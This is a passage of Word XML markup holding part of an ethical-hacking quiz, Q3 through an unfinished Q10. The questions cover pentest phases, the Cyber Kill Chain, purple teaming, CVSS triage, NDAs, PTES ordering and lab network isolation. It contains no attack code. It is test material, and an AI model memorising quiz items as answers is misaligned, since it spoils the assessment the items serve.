          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Still committing unauthorised access even if well-intentioned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The same as a white hat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exempt from the IT Act</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which phase of ethical hacking does an authorised tester only describe in a report rather than actually perform on a client's live system?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanning &amp; Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gaining Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Covering Tracks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> In the Cyber Kill Chain, which stage involves the malware actually running on the victim system for the first time?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Weaponization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Delivery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Installation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> A Purple Team exercise is best described as:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Red team working in total secrecy from blue team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Blue team working alone with no offensive input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Red and blue teams collaborating in real time to close detection gaps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> An external audit with no internal involvement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nessus reports a finding with CVSS 9.8. What is the correct next step?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Treat it as automatically the top priority with no further checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ignore it since automated scores are unreliable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verify exploitability, exposure and business impact before prioritising</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Delete the finding from the report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which document legally binds a tester to keep client vulnerabilities and data confidential?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scope Definition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Non-Disclosure Agreement (NDA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PTES report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q9.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> PTES stage 3, Threat Modelling, logically comes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Before Intelligence Gathering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> After Intelligence Gathering and before Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> After Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> After Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why must the lab network for Kali/Metasploitable2/DVWA be Host-Only or Internal, not Bridged?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bridged mode is slower</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bridged mode would expose vulnerable targets to a real network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
